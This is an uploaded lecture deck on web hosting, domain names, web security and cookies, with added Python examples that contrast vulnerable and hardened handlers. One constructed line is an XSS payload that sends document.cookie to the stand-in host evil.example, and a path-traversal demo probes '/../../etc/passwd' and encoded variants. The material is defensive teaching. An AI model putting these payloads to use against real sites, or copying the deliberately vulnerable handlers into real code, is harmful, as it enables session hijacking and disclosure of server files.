Web Hosting Security

This document summarizes various topics related to web hosting and security. It discusses options for hosting a website such as doing it yourself or using an internet service provider (ISP), factors to consider for each option. It also covers domain names, common web security threats, and how cookies help address the statelessness of the web to track users across requests.

Uploaded by Kassahun Tadesse

Web Hosting & Security

Major Topics

1. Hosting your website on your own server
2. Using an ISP to host your website
3. Domain Names
4. Web Security
5. Statelessness of the web & Cookies
1. Hosting your website on your own server

• Hosting your website on your own server is always a possible option. To
have a really functioning website, consider the following:
• Hardware expenses: you will have to buy some powerful server
hardware. Don't expect a low-cost PC to do the job.
• High-speed connection: you will also need a permanent (24 hours a
day / 7 days a week / 365 days a year) high-speed connection.
• Software expenses: consider the number of users that can connect to
your server, because some server licences limit the number of
concurrent users or connections.
• Labour expenses: give appropriate consideration to labour expenses.
You have to install your own hardware and software. You also have to
deal with bugs and malware, apply security patches, take backups and keep
your server constantly running in an environment where "everything could
happen". Every one of these tasks is your responsibility rather than a
provider's.
2. Using an ISP to host your website

• Renting a server from an Internet Service Provider (ISP) is a common
option. Most small companies store their web site on a server provided by an
ISP. Here are some advantages of this option:
• Connection speed: most ISPs have very fast connections to the Internet.
• Powerful hardware: ISPs often have powerful web servers that can be shared
by several companies. You can also expect them to have effective load
balancing and the necessary backup servers.
• Security and stability: ISPs are specialists in web hosting. Expect their servers
to have more than 99% uptime, the latest software patches, and up-to-date virus
protection. Note that 99% uptime still allows more than three and a half days of
downtime per year, so read the service-level agreement rather than the brochure.
Remember also that the ISP patches the server and the platform; the security of
your own application code remains your responsibility.
Things to consider while choosing an ISP
• 24-hour support: make sure your ISP offers 24-hour support. Don't put yourself in a
situation where you cannot fix critical problems without having to
wait until the next working day. A toll-free phone number could be vital if you
don't want to pay for long-distance calls.
• Daily backup: make sure your ISP runs a daily backup routine; otherwise you may lose
valuable data. Ask where the backups are kept, and test that a restore actually works.
• Traffic volume: study the ISP's traffic volume restrictions. Make sure that you don't have
to pay a fortune for unexpectedly high traffic if your web site becomes
popular.
Things to consider while choosing an ISP (Continued…)

• Bandwidth or content restrictions: study the ISP's bandwidth and content restrictions. If
you plan to publish pictures or broadcast video or audio, make sure that you can.
• E-mail capabilities: make sure your ISP supports the e-mail capabilities you need.
• FrontPage extensions: if you use FrontPage to develop your web site, make sure your ISP
supports FrontPage server extensions. (FrontPage and its server extensions have been
discontinued by Microsoft for many years; the general point is to check that the hosting
platform supports the publishing tool you actually use.)
• Database access: if you plan to use data from databases on your web site, make sure your
ISP supports the database access you need.
3. Domain Names
• A domain name is a unique name for a web site, like mitethiopia.edu.et.
Domain names must be registered through domain name registration
companies (registrars). These companies provide interfaces to search for available
domain names, and they offer a variety of domain name extensions that can
be registered at the same time.
• When a domain name is registered, it is added to the registry for that
extension. In addition, information about the web site, including its IP
address, is stored on the domain's authoritative DNS server.
• DNS stands for Domain Name System. It is a distributed database: the
authoritative DNS server for a domain answers queries about that domain (for example,
which IP address a name points to), and other computers on the Internet obtain that
answer through resolvers that walk the hierarchy down from the root servers. Whoever
controls the registrar account and the authoritative DNS records controls where the name
points, so protect those accounts like any other administrative credential.
3. Domain Names(Continued…)
Choosing a Domain Name
• Choosing a domain name is a major step for any individual or organization. New
domain name extensions and creative thinking still offer thousands of excellent
domain names!
• When choosing a name, it is important to consider the purpose of a domain name,
which is to provide an easy way to reach your web site.
• The best domains have the following characteristics:
• Short - people don't like to type! A short domain name is easier to type, read, and remember.
• Meaningful - a short domain is nothing without meaning, a domain name like 34i4nh.com is not easy to
enter or to remember. Select a domain that relates to your site in a way that people will understand.
• Clear - clarity is important when selecting a domain name. Avoid a name that is difficult to spell or
pronounce.
• Exposure - names that are short and easy to remember are an asset. In addition to visitors, also consider
search engines.
4. Web Security
• A computer is secure if you can depend on it and its software to behave as
you expect.
• While much of the effort in computer security is focused on countering the
threat from malicious humans, a truly secure computer must also contend
with the threats posed by legitimate, though careless, humans as well as acts
of nature.
• The web poses some additional security troubles because:
• very many different computers are involved in any networked
environment;
• the physical infrastructure of the Internet is not owned or controlled by
any one organization, and anyone, anywhere, can launch an attack on your website;
• no guarantees can be made concerning the integrity and security of any
part of the Internet, so a web server must assume that any request may be hostile.
4. Web Security (Continued…)

• The following are among the most common security attacks on the web:
• Script injection attacks (today usually called cross-site scripting, XSS): these
involve adding some client-side browser script code (for example, JavaScript) to
one of the application's forms or parameters so that, once the value is displayed on
the site without being encoded, the code runs in the end user's browser. This code can
do anything that client-side script code can do, but is often used to redirect the user
to another site for some malevolent purpose. Such script code can also forward the
user's session cookie or session key to another site, so that the recipient can
impersonate the legitimate owner of that session. The defence is to treat every value
from the client as text and HTML-encode it on output.
• GET/POST parameter hacking (parameter tampering): this attack consists of
rewriting GET request query strings, POST request bodies (form fields, including
hidden ones) or HTTP headers to trick the web application into behaving differently.
Examples include: setting the price of an item to a very low or zero dollar value,
asking the web application to display the contents of a file containing sensitive
information, uploading harmful programs to the server, or merely breaking or
disabling the web application. Nothing on the client side (hidden fields, disabled
form controls, JavaScript validation) prevents this; only server-side validation does.
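The two attacks above, each shown as a vulnerable request handler next to its hardened form. This is an added example written for this page, not code from the slides; the product SKUs, prices, the evil.example host and the attack inputs are all constructed for the demonstration.

```python
import html
from urllib.parse import parse_qs

# Constructed server-side catalogue (hypothetical SKUs, prices in cents).
# The hardened checkout takes the price from here, never from the request.
CATALOGUE = {"sku-100": 4999, "sku-200": 1250}

# Constructed attack inputs, exactly as an attacker would submit them.
XSS_PAYLOAD = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
TAMPERED_QUERY = "sku=sku-100&qty=3&price=1"   # client "sets the price" to 1 cent


def render_comment_vulnerable(comment: str) -> str:
    """Script injection: the submitted comment is pasted into the page as markup,
    so a <script> element in it runs in every visitor's browser."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened form: the comment is HTML-encoded on output, so the browser
    displays the characters < > & " ' as text instead of parsing them."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def checkout_vulnerable(query_string: str) -> int:
    """Parameter hacking: the total is computed from a price the client sent."""
    params = parse_qs(query_string)
    qty = int(params["qty"][0])
    price = int(params["price"][0])           # attacker controls this value
    return qty * price


def checkout_safe(query_string: str) -> int:
    """Hardened form: only sku and qty come from the client, both are validated,
    and the price is looked up server side. A 'price' parameter is ignored."""
    params = parse_qs(query_string)
    sku = params.get("sku", [""])[0]
    if sku not in CATALOGUE:
        raise ValueError("unknown sku")
    try:
        qty = int(params.get("qty", [""])[0])
    except ValueError:
        raise ValueError("qty must be an integer") from None
    if not 1 <= qty <= 100:                   # reject 0, negative and absurd quantities
        raise ValueError("qty out of range")
    return qty * CATALOGUE[sku]


if __name__ == "__main__":
    print(render_comment_vulnerable(XSS_PAYLOAD))   # <script> reaches the browser
    print(render_comment_safe(XSS_PAYLOAD))         # &lt;script&gt; is shown as text
    print(checkout_vulnerable(TAMPERED_QUERY))      # 3: three items for 3 cents
    print(checkout_safe(TAMPERED_QUERY))            # 14997: three items at list price
```

The encoding in render_comment_safe is the right fix for values placed in HTML element content; a value placed inside a JavaScript string or a URL needs the encoding for that context instead, which is why templating engines that escape by default are preferable to hand-written string concatenation.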
4. Web Security (Continued…)

• Web security guidelines:

• Control physical access to your web server hardware. Physical access to
computer hardware gives even a slightly skilled person total control of that
hardware. Without physical security to protect hardware (i.e. doors that lock)
nothing else about a computer system can be called secure.
• Enforce authentication and authorization in your web server.
• Run "services" on your system under user accounts with minimum privileges, and
restrict each service to a closed-off region of the file system (for example a chroot
jail or a container), so that a compromised service cannot read or alter the rest of
the system.
• Keep proper backups, stored separately from the server and tested by restoring them.
• Trust nothing about the data sent from the client: validate every parameter, header
and cookie on the server before using it.
• Disable any special functionality of the server-side scripting platform that is not
needed and that could be used in an attack.
• Run HTTPS if your website has content of any type that contains sensitive
information (and preferably for everything, since login forms and session cookies are
sensitive). Shut down all non-essential listening ports on your system.
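The "closed-off region of the file system" guideline, applied at the application level: a chroot jail needs root and operating-system support, but the web application itself must still refuse to serve any file outside its document root, which is the defence against the "display the contents of a sensitive file" attack listed earlier. The example below is added for this page and is not from the slides; the directory layout, the secret file and the request paths are constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under_root(doc_root: str, requested: str) -> str:
    """Map a request path onto the file system, refusing anything outside doc_root.

    Steps: percent-decode once, make the path relative, canonicalise it
    (realpath resolves '..' and follows symbolic links), then check that the
    canonical result still lies under the canonical document root.
    """
    root = os.path.realpath(doc_root)
    decoded = unquote(requested)                      # %2e%2e -> ..
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # commonpath, not a string prefix test: "/srv/www" must not accept "/srv/www2/x"
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"request escapes document root: {requested!r}")
    return candidate


def build_demo_root() -> tuple:
    """Constructed layout: a document root holding a page and a subdirectory,
    plus a secret file outside the root that a symbolic link inside it points at."""
    root = tempfile.mkdtemp(prefix="docroot-")
    outside = tempfile.mkdtemp(prefix="outside-")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    os.mkdir(os.path.join(root, "img"))
    with open(os.path.join(outside, "secret.txt"), "w") as f:
        f.write("db password")
    os.symlink(os.path.join(outside, "secret.txt"), os.path.join(root, "leak"))
    return root, outside


def probe(doc_root: str, requested: str) -> str:
    """Return 'served:<path relative to root>' or 'refused' for one request."""
    try:
        resolved = resolve_under_root(doc_root, requested)
    except PermissionError:
        return "refused"
    return "served:" + os.path.relpath(resolved, os.path.realpath(doc_root))


if __name__ == "__main__":
    root, _ = build_demo_root()
    for req in ("/index.html", "/img/../index.html", "/../../etc/passwd",
                "/%2e%2e/%2e%2e/etc/passwd", "/leak"):
        print(f"{req:28} -> {probe(root, req)}")
```

Two details matter in practice: decode the URL exactly once before resolving (decoding twice re-opens the %252e%252e bypass), and compare canonical paths with commonpath rather than a string prefix, so that a sibling directory whose name merely begins with the root's name is not accepted.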
5. Statelessness of the web & Cookies
• The Web is basically stateless. There is no concept of a login session. The browser
sends a request to a server and gets back a file. Then the server forgets that it has ever
seen that particular client.
• At first, when the Web was just used for retrieving publicly available documents, this
model was perfectly adequate. But as the Web started to acquire other functions, it
caused problems.
• For example, some Web sites require clients to register (and possibly pay money) to
use them. This raises the question of how servers can distinguish between requests
from registered users and everyone else.
• A second example is from e-commerce. If a user wanders around an electronic store,
tossing items into her shopping cart from time to time, how does the server keep track
of the contents of the cart?
• A third example is customized Web portals such as Yahoo. Users can set up a
detailed initial page with only the information they want (e.g., their stocks and their
favourite sports teams), but how can the server display the correct page if it does not
know who the user is?
5. Statelessness of the web & Cookies(Continued…)

• At first glance, one might think that servers could track users by observing their IP
addresses.
• However, this idea does not work. First of all, many users work on shared
computers, especially at companies, and the IP address merely identifies the
computer, not the user. Second, and even worse, many ISPs use NAT, so all
outgoing packets from all users bear the same IP address. From the server's point of
view, all the ISP's thousands of customers use the same IP address.
• To solve this problem, Netscape devised a much-criticized technique called cookies.
The name derives from ancient programmer slang in which a program calls a
procedure and gets something back that it may need to present later to get some work
done.
• When a client requests a web page, the server can supply additional information along
with the requested page, in a Set-Cookie response header. This information is a cookie: a
small (at most 4 KB) string. Browsers store offered cookies in a cookie directory on
the client's hard disk unless the user has disabled cookies, and return them to the
same site in a Cookie header on each later request. That returned cookie is what lets
the server recognize the client again, which is why stealing it is equivalent to
stealing the session.
5. Statelessness of the web & Cookies(Continued…)

• The structure of cookies (figure not reproduced): a cookie has up to five fields,
Domain, Path, Content (name = value), Expires and Secure, described on the next slide.
5. Statelessness of the web & Cookies(Continued…)

• Cookies are just files or strings, not executable programs. In principle, a cookie could contain a
virus, but since cookies are treated as data, there is no official way for the virus to actually run
and do damage. However, it is always possible for some hacker to exploit a browser bug (or a
server-side bug that trusts the cookie's content) to cause activation.
• A cookie may contain up to five fields, as shown in the previous slide. The Domain field
says which domain the cookie belongs to and will be returned to. Browsers check that a
server is not lying about its domain: a server may only set a cookie for its own host or a
parent domain of it, never for an unrelated domain. Older browsers limited each domain to
20 cookies per client; current browsers allow at least 50 (RFC 6265). The Path is a path in the
server's directory structure that identifies which parts of the server's URL tree the cookie is
returned for. It is often /, which means the whole tree.
• The Content field takes the form name = value. Both name and value can be anything the server
wants. This field is where the cookie's content is stored.
• The Expires field specifies when the cookie expires. If this field is absent, the browser discards
the cookie when it exits. Such a cookie is called a non-persistent (or session) cookie. If a time and
date are supplied, the cookie is said to be persistent and is kept until it expires.
• The Secure field can be set to indicate that the browser may only return the cookie to a secure
(HTTPS) server. This feature is used for e-commerce, banking, and other secure applications.
Modern browsers also honour two attributes not in this list: HttpOnly, which keeps the cookie
out of reach of client-side script (a direct mitigation for the session-stealing script injection
described earlier), and SameSite, which limits when the cookie is sent on cross-site requests.
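The five cookie fields and the browser-side checks described above, as a small model of the Set-Cookie / Cookie exchange. This is an added example for this page, not code from the slides: the example.com hostnames and cookie values are constructed, the clock is fixed so that "expired" is deterministic, and the matching rules are simplified (real browsers also consult the Public Suffix List and implement the HttpOnly and SameSite attributes, which are omitted here).

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional

# Constructed "current time" so that persistent-cookie expiry is reproducible.
NOW = datetime(2025, 6, 1, 12, 0, tzinfo=timezone.utc)


@dataclass
class Cookie:
    name: str                            # Content: name = value
    value: str
    domain: str                          # Domain: which hosts the cookie is returned to
    path: str = "/"                      # Path: which part of the URL tree
    expires: Optional[datetime] = None   # Expires: None means non-persistent
    secure: bool = False                 # Secure: only returned over HTTPS


def _domain_matches(host: str, cookie_domain: str) -> bool:
    """host is cookie_domain itself or a subdomain of it."""
    return host == cookie_domain or host.endswith("." + cookie_domain)


def _path_matches(request_path: str, cookie_path: str) -> bool:
    """request_path is cookie_path or lies beneath it ("/shop" covers "/shop/cart",
    but not "/shopping")."""
    return request_path == cookie_path or request_path.startswith(cookie_path.rstrip("/") + "/")


def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Parse a Set-Cookie header received from request_host, applying the browser's
    check that a server may only set a cookie for its own host or a parent domain."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip(), domain=request_host.lower())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            dom = val.lstrip(".").lower()
            if not _domain_matches(request_host.lower(), dom):
                raise ValueError(f"{request_host} may not set a cookie for {dom}")
            # Real browsers additionally refuse public suffixes such as "com" (Public
            # Suffix List); that list is omitted in this model.
            cookie.domain = dom
        elif key == "path":
            cookie.path = val or "/"
        elif key == "expires":
            cookie.expires = parsedate_to_datetime(val)   # RFC 1123 date, e.g. "..., GMT"
        elif key == "secure":
            cookie.secure = True
    return cookie


def should_send(cookie: Cookie, host: str, path: str, https: bool, now: datetime = NOW) -> bool:
    """The browser's decision on whether to attach this cookie to a request."""
    if cookie.expires is not None and now >= cookie.expires:
        return False                                  # persistent cookie has expired
    if cookie.secure and not https:
        return False                                  # Secure cookies stay off plain HTTP
    return _domain_matches(host.lower(), cookie.domain) and _path_matches(path, cookie.path)


def cookie_header(jar: list, host: str, path: str, https: bool, now: datetime = NOW) -> str:
    """Build the Cookie request header from the cookies the browser holds."""
    return "; ".join(f"{c.name}={c.value}" for c in jar if should_send(c, host, path, https, now))


if __name__ == "__main__":
    jar = [
        parse_set_cookie("session=abc123; Domain=example.com; Path=/; Secure", "shop.example.com"),
        parse_set_cookie("cart=3items; Path=/shop", "shop.example.com"),
        parse_set_cookie("old=1; Expires=Wed, 01 Jan 2020 00:00:00 GMT", "shop.example.com"),
    ]
    print(cookie_header(jar, "shop.example.com", "/shop/cart", https=True))   # session=abc123; cart=3items
    print(cookie_header(jar, "shop.example.com", "/shop/cart", https=False))  # cart=3items
    print(cookie_header(jar, "www.example.com", "/", https=True))             # session=abc123
```

The second print is the practical reason for the Secure flag: without it, a single plain-HTTP request to the site (an image link, a redirect) would carry the session cookie in the clear, where anyone on the path can read it and impersonate the user.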
End of slides

• Any questions?
